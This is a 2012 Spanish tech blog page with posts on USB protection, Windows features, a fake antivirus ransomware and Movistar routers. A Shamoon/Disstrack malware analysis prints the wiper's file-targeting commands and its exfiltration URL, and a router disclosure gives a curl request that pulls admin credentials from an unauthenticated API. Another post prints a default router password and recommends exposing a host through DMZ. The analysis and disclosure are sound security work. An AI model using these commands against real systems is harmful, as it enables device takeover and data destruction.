Buscar este blog

jueves, 30 de agosto de 2012

Tus memorias USB, limpias de archivos maliciosos autoejecutables

 

Una de las principales puertas de entrada a nuestro PC para archivos maliciosos son las llaves USB o las tarjetas de memoria, que contienen archivos ejecutables que se activan automáticamente al conectarlos al ordenador. Con BitDefender USB Immunizer pondrás solución a este problema.

BitDefender USB Immunizer se encarga de immunizar tus llaves USB de modo que éstas no puedan autoejecutar archivos maliciosos. Incluso si conectas tu USB a un ordenador infectado, éste será incapaz de crear un archivo ejecutable. BitDefender USB Immunizer también ofrece la posibilidad de proteger tu PC impidiendo que ejecute los archivos autoejecutables presentes en las llaves USB.

BitDefender USB Immunizer es una manera efectiva de blindar tus llaves USB y tu PC ante archivos maliciosos autoejecutables pero, eso sí, no olvides complementar la protección que ofrece BitDefender USB Immunizer con una solución antivirus completa.

Pros

  • Protección eficaz para tus llaves USB
  • No necesita instalación

Contras

  • Los USB ya no se ejecutarán automáticamente al conectarlos, aunque no estén infectados

lunes, 27 de agosto de 2012

Virus capaz de destruir la MBR, documentos, fotos y vídeos: Disstrack

Disstrack

Actualidad Virus

Buscar virus

Gusano para plataformas Windows que se propaga a través de unidades de red compartidas, extrae del propio ejecutable e instala nuevos modulos que sobreescriben ficheros del equipo, dejándolo inservible y modifican el registro de maestro de arranque e manera que el equipo no pueda volver a arrancar

Detalles técnicos
  • Difusión: Baja
  • Daño: Bajo
  • Dispersibilidad: Baja
  • Fecha de alta: 20/08/2012
  • Última actualización: 23/08/2012

Propagación

Capacidad de autopropagación: No

Carece de rutina propia de propagación. Puede llegar al sistema de las siguientes maneras:

Unidades del Sistema
Unidades del sistema (locales, mapeadas, extraíbles)
Unidades Locales del Sistema
Se propaga a unidades locales del sistema.
Otro mecanismo de propagación
  • Descargado por otro código malicioso o descargado sin el conocimiento del usuario al visitar una página Web infectada.
  • Descargarlo de algún programa de compartición de ficheros (P2P).

 

Infección/Efectos

Cuando Disstrack se ejecuta, realiza las siguientes acciones:

Ficheros y carpetas
  1. Crea los siguientes ficheros
    • "%System%\trksrv.exe"
    • "%System%\drivers\drdisk.sys"
    • "%System%\netinit.exe"
    • "%System%\[Nombre-Seleccionado-de-una-lista].exe"
Resto de acciones
    Método de infección

    El gusano llega al equipo comprometido a través de unidades de red compartidas:

    • \\[EQUIPO]\ADMIN$
    • \\[EQUIPO]\C$\\WINDOWS
    • \\[EQUIPO]\D$\\WINDOWS
    • \\[EQUIPO]\E$\\WINDOWS

    El fichero original es un ejecutable de 32 bits de nombre TRKSVR.EXE de 989184 bytes de tamaño. Cuando se ejecuta se instala como un servicio del sistema. Este servicio extrae del propio fichero ejecutable, e instala, otros componentes/módulos. Estos componentes estan almacenados en ejecutable original como recursos con nombres PKCS12, PKCS7 y X509.

    Otros detalles

    Cuando el gusano es ejecutado, se copia a sí mismo en las siguientes unidades de red compartidas:

    • \\[EQUIPO]\ADMIN$
    • \\[EQUIPO]\C$\\WINDOWS
    • \\[EQUIPO]\D$\\WINDOWS
    • \\[EQUIPO]\E$\\WINDOWS

    El gusano consta de varios componentes:

    • Un Dropper: Componente principal que descarga otros módulos y es el primero que infecta el sistema.
    • El "Wiper": Se trata del módulo que contiene la funcionalidad destructiva.
    • El informador (Reporter): Se trata del módulo que envía información de la infección al atacante.

    El Dropper tiene las siguientes funcionalidades:

    • Se copia a sí mismo en %System%\trksrv.exe
    • Descarga los siguientes módulos:
      • Un Dropper de 64 bits: Se encuentra en el fichero %System%\trksrv.exe en el recurso cifrado “X509”
      • El módulo informador: Se encuentra en el fichero %System%\netinit.exe en el recurso cifrado "PKCS7"
      • El módulo "Wiper" (Limpiador): Se encuentra en %System%\[Nombre-Seleccionado-de-una-lista].exe en el recurso cifrado "PKCS12"

      Nota: [Nombre-Seleccionado-de-una-lista] puede ser uno de los siguientes:

      • caclsrv
      • certutl
      • clean
      • ctrl
      • dfrag
      • dnslookup
      • dvdquery
      • event
      • extract
      • findfile
      • fsutl
      • gpget
      • iissrv
      • ipsecure
      • msinit
      • ntx
      • ntdsutl
      • ntfrsutil
      • ntnw
      • power
      • rdsadmin
      • regsys
      • routeman
      • rrasrv
      • sacses
      • sfmsc
      • sigver
      • smbinit
      • wcscript
    • Se copia a sí mismo en las siguientes unidades de red compartidas:
      • \\[EQUIPO]\ADMIN$
      • \\[EQUIPO]\C$\\WINDOWS
      • \\[EQUIPO]\D$\\WINDOWS
      • \\[EQUIPO]\E$\\WINDOWS
    • Crea una tarea programada para ejecutarse a sí mismo
    • Crea el siguiente servicio para ejecutarse cada vez que se inicia Windows:
      Servicio: TrkSvr
      Nombre: Distributed Link Tracking Server
      Ruta: %System%\trksvr.exe

    El módulo "Wiper" (Limpiador) realiza las siguientes tareas:


    • Borra el siguinte fichero de drivers y crea un fichero legítimo con el mismo nombre, pero que el troyano utiliza para leer y escribir directamente sectores en disco sin pasar por el sistema operativo:

      • %System%\drivers\drdisk.sys

      Este driver es usado para sobreescribir el MBR (Master Boot Record) del ordenador pero no es malicioso en sí mismo.

      El fichero esta firmado digitalmente por “EldoS Corporation".


    • Ejecuta los siguientes comandos para recabar nombres de ficheros , los cuales serán sobreescritos como f1.inf y f2.inf:
              dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i download 2>nul >f1.inf 

      dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i download 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i document 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i picture 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i video 2>nul >>f1.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i music 2>nul >>f1.inf

      dir "C:\Documents and Settings\" /s /b /a:-D 2>nul | findstr -i desktop 2>nul >f2.inf

      dir C:\Users\ /s /b /a:-D 2>nul | findstr -i desktop 2>nul >>f2.inf

      dir C:\Windows\System32\Drivers /s /b /a:-D 2>nul >>f2.inf

      dir C:\Windows\System32\Config /s /b /a:-D 2>nul | findstr -v -i systemprofile 2>nul >>f2.inf


      Nota: Los ficheros de f1.inf y f2.inf serán sobreescritos con una imagen JPEG que trae incorporada el modulo Wiper y que se puede ver más abajo. Los ficheros sobreescritos quedan inutiles y no puede ser reparados. Tienen que ser sustituidos por los ficheros originales.

      Nota: Estos comandos, entre otros sobreescriben:


      • Todos los fichero descargados por el usuario y que se encuentren en la carpeta "Descargas"
      • Todos los documentos del usuario que se encuentren en la carpeta "Mis Documentos"
      • Todas las imágenes del usuario que se encuentre en la carpeta "Mis imágenes"
      • Todos los videos del usuario que se encuentren en la carpeta "Vídeos"
      • Toda la música del usuario que se encuentre en la carpeta "Música"
      • Todos los ficheros que se encuentre en el escritorio
      • Todos los drivers del sistema alojados en C:\Windows\System32\Drivers
      • Todos los ficheros de configuración del sistema alojados en C:\Windows\System32\Config

    • El módulo sobreescribe el MBR y de esta manera el equipo comprometido no vuelve a arrancar.

    La siguiente cadena fue encontrada en el código fuente del módulo "Wiper" y da una idea de a quien va dirigido este gusano:

    C:\Shamoon\ArabianGulf\wiper\release\wiper.pdb

    Por último el módulo informador es responsable de enviar información sobre la infección al atacante.

    La Información es enviada usando una petición HTTP GET con la siguiente esctructura:

    http://[DOMINIO]/ajax_modal/modal/data.asp?mydata=[DATOS]&uid=[UID]&state=[ESTADO]

    La siguiente información es, de esta forma, mandada al atacante:


    • [MYDATA] = Indica cuantos ficheros fueron sobre escritos
    • [UID] = Dirección IP del equipo comprometido
    • [STATE] = Número aleatorio

    Nuevos routers ASL 26555 de Movistar, configuración y uso avanzado ... y backdoor (!)

    Hace unos días recibí una llamada de Movistar, con la que tengo contratado el ADSL, para comentarme que por motivos técnicos me iban a enviar un nuevo router ADSL ya que la instalación que les constaba que tenía se había quedado algo desactualizada.

    A los pocos días llegué a casa y, ¡router nuevo!

    Se trata de un router wifi ADSL2/2+ fabricado por Alpha Networks, y está etiquetado con el nombre Amper ASL 26555. Son los modelos más actuales de router casero que está distribuyendo actualmente Movistar a sus clientes. El zombie no viene incluido.

    Para acceder a la configuración tenemos diferentes opciones.

    El dispositivo cuenta con dos paneles web para su configuración, uno "dummy" de Movistar que corre en el puerto 80 y no vamos a tocar (por la complejidad del asunto), y el panel de configuración original de Alpha Networks que está en el puerto 8000.

    Si accedemos mediante el navegador a la IP del dispositivo utilizando el puerto 8000 (http://192.168.1.1:8000/) e introducimos los credenciales de administración (1234 / 1234 por defecto), accedemos al panel.

    Mediante este panel podemos configurar de forma avanzada el dispositivo.

    Como curiosidad, podemos ver toda la configuración que tiene Movistar para acceder a nuestro router a través de sus redes de forma transparente al usuario. Podemos cambiarla para no permitirles acceso, pero si luego no os funciona Internet y el técnico no puede acceder de forma remota, ¡no os quejéis!

    Otra posibilidad que nos da el router es acceder vía telnet.

    Si nos conectamos por telnet, vemos que utiliza BusyBox 1.00 con un juego de comandos algo reducido.

    $ telnet 192.168.1.1
    Trying 192.168.1.1...
    Connected to 192.168.1.1.
    Escape character is '^]'.
    login as: admin
    password:
    BusyBox v1.00 (2011.05.02-12:14+0000) Built-in shell (msh)
    Enter 'help' for a list of built-in commands.
    ASL-26555 #

    El dispositivo cuenta con una CPU MIPS 24K, arquitectura MIPS Little Endian.

    ASL-26555 # cat /proc/cpuinfo
    system type : Ralink SoC
    processor : 0
    cpu model : MIPS 24K V4.12
    BogoMIPS : 255.48
    wait instruction : yes
    microsecond timers : yes
    tlb_entries : 32
    extra interrupt vector : yes
    hardware watchpoint : yes
    ASEs implemented : mips16 dsp
    VCED exceptions : not available
    VCEI exceptions : not available

    El sistema de ficheros al que tenemos acceso no tiene permisos de escritura, a excepción de /tmp/, y con el BusyBox que viene instalado no podemos transferir datos a través de la red. Por suerte, el router tiene un puerto USB al que podemos conectar un dispositivo de almacenamiento. Si le conectamos un pendrive nos lo monta automáticamente en /var/tmp/storage_dev/usb1_1

    Podemos descargar el binario de la última versión de BusyBox para MIPSEL, que incluye un juego de comandos mucho más amplio, y meterlo en el pendrive.

    Ya que tenemos acceso a una consola con bastantes comandos, el siguiente paso es compilar nuestros propios programas.

    Para hacerlo necesitamos realizar compilación cruzada para MIPS. Podemos hacerlo con Buildroot, que nos permite generar un juego de herramientas para compilar código para diferentes arquitecturas.

    Una vez lo tengamos podemos probar a portar, por ejemplo, Unhide (herramienta de detección de rootkits y procesos ocultos).

    Unhide realiza algunas llamadas a comandos del sistema que no están disponibles, pero sí están en el BusyBox que hemos metido. Por ello, modificamos el código fuente para que ejecute los comandos a través de nuestro BusyBox, de esta forma no sólo nos vale para nuestro router sino para cualquier otro sistema embebido acompañado de un BusyBox actualizado.

    La modificación es trivial (unhide - unhide-tcp), ahora nos queda compilar el código. Con nuestras herramientas de compilación preparadas:

    mipsel-linux-gcc -static -O3 unhide.c -o unhide
    mipsel-linux-gcc -static -O3 unhide-tcp.c -o unhide-tcp

    Limpiamos un poco los binarios ...

    mipsel-linux-strip unhide
    mipsel-linux-strip unhide-tcp

    Y lo acompañamos del binario de BusyBox. Podéis descargar los tres binarios ya preparados aquí.

    Lo pasamos al pendrive y ejecutamos en el router:

    ASL-26555 # ls -l
    -rwxrwxrwx 1 0 0 65488 unhide-tcp
    -rwxrwxrwx 1 0 0 65752 unhide
    -rwxrwxrwx 1 0 0 1563696 busybox
    ASL-26555 # ./unhide sys
    Unhide 20110113
    http://www.unhide-forensics.info
    [*]Searching for Hidden processes through getpriority() scanning
    [*]Searching for Hidden processes through getpgid() scanning
    [*]Searching for Hidden processes through getsid() scanning
    ASL-26555 #

    Algo que he echado en falta es obtener el firmware a través de la web del fabricante. No lo he encontrado por internet, no obstante, si echamos un vistazo al CD de configuración avanzada que proporciona Movistar con el router, además de otros programas hay un agente de configuración remoto. Si lo instalamos y buscamos en el directorio dónde se ha instalado, podremos encontrar el firmware que está instalado por defecto. Para ahorraros el proceso, lo tenéis disponible aquí.

    Ya sabemos como configurar el router a fondo, meterle programas, compilar los nuestros propios y tenemos el firmware del dispositivo. Ahora falta la seguridad, ¡algo había que decir!

    La vulnerabilidad de la que vamos a hablar nos permite control total sobre el dispositivo con permisos de administrador. Es curiosa por su forma de ser y porque haya pasado desapercibida.

    Como hemos dicho antes, la forma de gestionar el router es a través de un panel web con autenticación que corre en el puerto 8000. La sorpresa es que en el mismo servidor web tenemos un directorio llamado /APIS/, que no requiere autenticación. Nos devuelve error 404 cuando lo visitamos, pero si sabemos los nombres de los ficheros que tiene podemos hacer llamadas a los mismos.

    Nos permite hacer diferentes llamadas para leer prácticamente toda la información de la configuración. Hay una llamada especial, con el nombre returnJSON.htm, que nos devuelve los credenciales del administrador.

    $ curl http://192.168.1.1:8000/APIS/returnJSON.htm
    {
    "RETURN":{
    "success": true,
    "errorDescription": "ERROR_GENERAL"
    },
    "USER":{
    "USERNAME": "admin",
    "PASSWORD": "adm1n_passw0rd_exposed"
    }
    }

    Con ésto podemos autenticarnos en el panel web y gestionar el dispositivo.

    Dado que dicha API no está documentada por ningún lado y no requiere autenticación, da la sensación de que el fallo es en realidad un backdoor que se dejó el fabricante original para poder acceder a información del dispositivo aunque no se conozcan los credenciales.

    Hay que añadir que con la configuración que carga Movistar en los routers, nadie fuera de nuestra red interna o de las redes de Movistar puede utilizar esto, ya que el servicio no es accesible por red sin contar esas dos excepciones.

    Publiqué la vulnerabilidad hace unos días, aquí está la descripción detallada, que incluye todas las llamadas que nos permite la API.

    Como conclusión, para ser un router casero está bien técnicamente y nos permite un control relativamente amplio sobre él. Tiene algunos puntos útiles, por ejemplo poder compartir el acceso al dispositivo USB a través de SMB por red para acceder a contenidos multimedia desde diferentes puntos. Merece la pena investigarlo un poco.
    Contribución por Alberto Ortega.

    Liberar puertos router BSH ASL-26555 Movistar

     

    Movistar va cambiando el router por uno supuestamente mejor: Amper BSH ASL-26555.

    2012-06-23-16_08_26


    El router incorpora una nueva interface web para acceder a su configuración.

    movistar1
    Esta interface cuenta con varias opciones entre ellas configuración del sistema wi-fi, identificar los equipos conectados (consolas, portátiles, PC, etc).

    movistar2


    Pero una de las cosas mas importantes en la actualidad en la liberación de puertos, ya sea para programas específicos, configuraciones, seguridad, accesorios que necesitan de un puerto especial liberado, etc. Con esta interface configurada por defecto es imposible hacer esa tarea, pero existe otra manera de acceder a dicha configuración.

     

    1. Escribimos en la barra de navegación: "192.168.1.1:8000" sin las comillas.

    2. Les pedirá los datos user: user
                                      pass: MOV15tar$$

    Los copian tal cual:

    movistar3


    Dan clic en aceptar y aparecerá lo siguiente:

    movistar4


    Clican primero en la opción del panel lateral izquierdo DMZ (Exposed Host):

    movistar5

    Luego clic en add/apply y cierran la ventana.

    Con este procedimiento hemos logrado saltar cualquier cortafuegos que nos impida la configuración o liberación de puertos.

    Recuerden que desde este momento estarán SIN PROTECCION cortafuegos. Pueden luego volver a su estado anterior.

    Aumentar la velocidad de USB en Windows 7

     

    Gracias a una actualización que ha liberado Microsoft, ahora podemos aumentar la velocidad de transferencia máxima de datos de nuestros dispositivos USB en Windows 7 y Windows Server 2008. A continuación les presento las instrucciones para instalar dicha actualización y modificar algunas entradas en el registro, lo cual nos permitirá llevar a cabo esta mejora.

    pen

     

    1. Para descargar la actualización nos dirigimos a la página de soporte Microsoft donde podremos encontrar un enlace para su descarga gratuita. Damos clic en “Ver y solicitar la descarga de la revisión” y seremos llevados a una página con el contrato de los términos y condiciones. Después de aceptar el contrato seremos redirigidos a otra página donde se nos presentan las versiones de la actualización para las distintas arquitecturas de PC. Elegimos la más adecuada a nuestro caso y escribimos nuestro correo electrónico donde lo indica, para proceder a descargar el archivo.

    2. Después de instalar la actualización, reiniciamos el PC para aplicar los cambios.

    3. Al reiniciar, nos dirigimos al menú Inicio y escribimos regedit para abrir el editor de registro de Windows.

    4. En el editor de registro buscamos la entrada que coincida con la siguiente cadena de texto:

    HKEY_LOCAL_MACHINE – SYSTEM – CurrentControlSet – Control – usbstor – VVVVPPPP.

    5. Si VVVVPPPP no existe, en la carpeta usbstor creamos una nueva clave o entrada llamada VVVVPPPP. Damos clic sobre ella, Vamos al menú EDITAR, seleccionamos nuevo y clicamos en DWORDValue.

    6. Escribimos MaximumTransferLength, y presionamos Enter.

    7. Clicamos menú EDITAR, y clicamos en MODIFICAR. Seleccionamos DECIMAL y escribimos el valor 2097120 (2MB).

    8. Volvemos a reiniciar el PC para aplicar los cambios.

    Con esta mejora notaremos un considerable aumento de la velocidad al transferir archivos desde dispositivos de almacenamiento USB al disco duro y viceversa.

    viernes, 24 de agosto de 2012

    File History: Microsoft Windows 8 y el nuevo Historial de archivos.

    Con la aparición en el mercado de Microsoft Windows Vista se agregó una nueva funcionalidad para la protección de archivos conocida como Versiones anteriores. Esta nueva funcionalidad genera puntos de restauración locales desde los cuales es posible recuperar datos que se borren por accidente.

    image

    Figura 1 – Logo Microsoft Windows 8.

    Ahora con la aparición de Microsoft Windows 8 se ha incorporado una nueva funcionalidad llamada Historial de archivos. Esta nueva funcionalidad permite hacer una copia de los archivos que seleccionemos en una ubicación remota, pudiendo posteriormente recuperar los datos en caso de un eventual borrado. Para configurarlo deberemos acceder al “panel de control”, si tenemos la vista como Iconos grandes o iconos pequeños, lo encontraremos directamente, si tenemos la vista por categoría, podemos encontrarlo en la categoría “Sistema y seguridad”.

    image

    Figura 2 – Historial de archivos.

    Lo primero que debemos hacer es seleccionar la ubicación donde se realizará el Historial de archivos, no pudiendo ser la unidad en la que se encuentra el sistema operativo instalado. En este ejemplo seleccionaré una ubicación de red.

    image

    Figura 3 – Añadir ubicación para Historial de archivos.

    Una vez agregada la unidad de destino, solo deberemos activar el Historial de archivos el cual realizará una primera copia de seguridad de los archivos, las ubicaciones desde las que copiarán los datos son:

    • Bibliotecas.

    • Escritorio.

    • Contactos.

    • Favoritos.

    Mostrando una vez finalizada la copia la ruta donde se encuentra y la fecha/hora de la última copia.

    image

    Figura 4 – Historial de archivos activo.

    En la parte de la izquierda tenemos el menú del Historial de archivos, pudiendo excluir carpetas de la copia. Si accedemos a configuración avanzada podremos modificar:

    • La frecuencia con la que se harán copias de las carpetas seleccionadas.

    • El tamaño de la caché sin conexión.

    • El tiempo que se almacenará cada copia de seguridad del Historial.

    • Ver los registros de eventos del Historial de archivos.

    image

    Figura 5 – Configuración avanzada del Historial de archivos.

    Una opción que se echa de menos es la posibilidad de añadir nuevas carpetas al Historial de archivos, pero existe una manera de hacerlo, puesto que el Historial de archivos hace copia de las bibliotecas, es tan sencillo como generar bibliotecas y agregar las carpetas que deseemos incluir . Veamos como recuperar archivos. Es tan sencillo como ir a la opción restaurar archivos personales, esto nos abrirá un navegador desde el que podremos visualizar el contenido de cada versión. Cada versión corresponde a una copia de seguridad, es decir, generará una versión nueva del historial cada vez que se realice dicha copia de seguridad. Deberemos seleccionar la versión en la que se encuentre el archivo en concreto, posicionarnos en él y pulsar el botón para restaurarlo, con lo que éste será copiado a la ubicación correspondiente.

    image

    Figura 6 – Recuperación de archivos.

    Para terminar os mostraré como quedan organizados los datos en la unidad de destino, es una organización sencilla y bastante curiosa. Dentro de la ubicación seleccionada nos encontraremos una carpeta con el nombre del usuario al que pertenece el Historial de archivos, esto posibilita utilizar la misma ubicación para varios usuarios, puesto que el Historial de archivos los organizará por nombres de usuario automáticamente. Si entramos dentro de la carpeta de un usuario, encontraremos una carpeta con el nombre del equipo al que pertenece el Historial de archivos. Esto a mi parecer es otro acierto, puesto que, si ya teníamos en una misma ubicación organizados los historiales por usuario, tras este último paso, si un usuario utiliza varios equipos, podrá identificar a que equipo pertenece cada historial al generar una carpeta para cada equipo.

    Una vez dentro de la carpeta de usuario y dentro de ésta en un equipo en concreto, podemos ver dos carpetas:

    • Configuración. En esta carpeta se almacenan los datos de configuración del Historial de archivos, podemos observar un archivo Config.xml. Si abrimos el archivo podemos apreciar como contiene las rutas de las carpetas de las que se hará la copia y la ruta de destino para ésta, así como la configuración del historial y los valores seleccionados en la configuración avanzada.

    xml

    Figura 7 – Config.xml.

    • Datos. Esta carpeta contiene los datos pertenecientes a la copia. Desde ella también podemos acceder y recuperar los archivos que contiene el historial.

    Para que os hagáis una idea de como sería la estructura aquí os dejo un gráfico que he generado:

    image

    Figura 8 – Organigrama del Historial de archivos en su ubicación.

    En definitiva una nueva funcionalidad de Microsoft Windows 8 que aporta una nueva manera de dar seguridad a nuestros datos y prevenir la pérdida accidental de estos.

    image

    jueves, 23 de agosto de 2012

    Ransomware: Falso Microsoft Security Essentials

     

     

    Ransomware: Falso Microsoft Security Essentials

    Microsoft Security Essentials es uno de los antivirus gratuitos más populares y no es nada nuevo que aparezcan versiones falsas de este (como ya hemos comentado anteriormente) que intenten engañar a los usuarios incautos.

    En este caso nos encontramos con un nuevo espécimen que tiene la particularidad de que aparte de ser un “Falso Antivirus” disfrazado como ‘Microsoft Security Essentials’ (MSE), utiliza técnicas de Ransomware secuestrando el sistema, alegando que este será bloqueado por razones de seguridad y solo podrá ser liberado a cambio la compra de un ‘módulo especial’ que obviamente es parte del timo.

    Recordemos el ransomware es un tipo de virus informático (malware) que se caracteriza por secuestrar el acceso al sistema o archivos a cambio de un pago y de los que hemos venido hablando mucho @InfoSpyware debido al famoso “Virus de la Policía”

    alt tag

    Características del Fake MSE Alert:

    Propagación: A diferencia de sus primos ransomwares, este No se aprovecha de ninguna vulnerabilidad conocida o desconocida de JAVA y requiere si la ejecución de un archivo para infectar el sistema en primera instancia, como lo hacen la mayoría de los falsos AVs.

    Scareware: Su mensaje de alerta en lugar de ocupar toda la pantalla, se abre en forma de ventana emergente, simulando así las ventanas de alerta de ‘Microsoft Security Essentials’ en donde alerta que su sistema será bloqueado por razones de seguridad, mostrando además una seria de supuestos archivos infectados que dice son por visitar sitios webs pornográficos o infectados. Ver imagen de arriba.

    Estafa. Avisa a la víctima que podrá liberar su sistema, luego de enviar un pago a través Paysafecard o Ukash, para poder añadirle un ‘módulo especial’ para limpiar el sistema de esos malwares (algo que obviamente no existe y es parte del timo.) Ver imagen de abajo:

    Ransomware: Falso MSE

    Bloqueos: No bloquea el acceso al ‘Task Manager’ ni al reinicio en ‘Modo Seguro’ del sistema.

    Eliminación: Su eliminación es relativamente sencilla, simplemente quitando esta llave del registro y su archivo: O4 – HKCU/../Run: [SkypePM] C:/Documents and Settings/Local Settings/Application Data/Skype/SkypePM.exe

    Detección. Al momento de enviar la muestra provista por el investigador francés (@Xylitol) a VirusTotal, solo 24/42 AVs lo detectaron como malware, e irónicamente el verdadero ‘Microsoft Security Essentials’ no lo pudo detectar :( cuac!

    viernes, 10 de agosto de 2012

    Windows Live Essentials 2012

    Para todos aquellos que estaban esperando la versión más actual de Windows Live Essentials, les cuento que ya la pueden encontrar, aunque ahora presenta un ligero cambio en el nombre, además. por supuesto de los cambios y actualizaciones respectivos en las aplicaciones que comprende.

    windows-essentials

    Empezaré, entonces, por contarles que ahora esta suite de Microsoft ha pasado a llamarse Windows Essentials 2012, simplemente, dejando de lado el término ‘Live’, aunque, por extraño que parezca, este sigue presente en las versiones actuales de las aplicaciones Windows Live Messenger y Windows Live Mail.

    Otra de las novedades que trae Windows Essentials 2012, es que ya no hay Windows Live Mesh, ya que su reemplazante es el cliente de escritorio de SkyDrive. Y si bien estos dos servicios pueden tener similitudes, al cliente de escritorio de SkyDrive le hace falta la sincronización peer-to-peer sin tener que pasar por la nube. Una característica que sí encontrábamos en Mesh.

    Por otro lado, las aplicaciones Photo Gallery y Movie Maker también han sido rebautizadas así como las he escrito aquí, es decir, sin añadirle un nombre al inicio o al final. Y estas dos traen, por supuesto, novedades interesantes. En el caso de Photo Gallery se ha incluido una opción para hacer collages de 7 a 50 fotografías. Mientras que en Movie Maker, ahora se puede estabilizar los videos (solo en Windows 8), integración con servicios de música para incluir temas en los videos, además de una opción para enfatizar un audio seleccionado sobre el resto.

    Si alguno de ustedes quiere actualizar ya a Windows Essentials 2012, pueden hacerlo por medio del instalador completo, o del instalador web.

    Fuente: LiveSide

    Jueves 9 de agosto, 2012 por Jorge Verástegui